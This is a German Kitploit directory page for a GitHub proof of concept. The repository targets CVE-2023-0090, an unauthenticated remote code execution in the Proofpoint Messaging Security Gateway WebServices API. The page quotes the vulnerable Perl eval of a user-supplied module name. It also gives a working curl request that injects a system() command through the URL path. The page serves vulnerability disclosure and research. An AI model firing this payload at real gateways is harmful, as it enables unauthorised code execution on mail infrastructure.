Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
proofpoint-CVE-2023-0090 — Proofpoint Email Gateway: Nicht authentifizierte RCE | Kitploit
Tools/GitHubGitHub/ly1g3/proofpoint-cve-2023-0090
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubly1g3/proofpoint-cve-2023-0090

proofpoint-CVE-2023-0090

Proofpoint Email Gateway: Nicht authentifizierte RCE

Repository anzeigen
11vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Über

Sicherheitsforscher: ly1g3, ly1g3[at]tuta.io

GPG-Fingerabdruck: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Übersicht: Remote Code Execution - Nicht authentifizierte RCE

CVE: CVE-2023-0090

Zeitplan:

  • Entdeckt - ly1g3
  • Gemeldet - ly1g3
  • Behoben - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploits für Proofpoint Messaging Security Gateway

Remote Code Execution (RCE)

Mit Zugriff auf die WebServices-API kann eine nicht authentifizierte RCE mit Administratorrechten erreicht werden.

Technisch

Webservices.pm bereinigt oder überprüft keine Benutzereingaben. Es ist keine Authentifizierung erforderlich, um die Funktion zu erreichen, aber der API-Zugriff muss in den Einstellungen aktiviert sein, um RCE durchführen zu können. $module stammt direkt aus Benutzerdaten und wird ausgewertet.

root@kitploit:~

my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";

...


eval("require $module");

POC

Erstellt eine Datei namens abc in /tmp/. Code wird als Benutzer pps ausgeführt.

root@kitploit:~
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
Tool herunterladen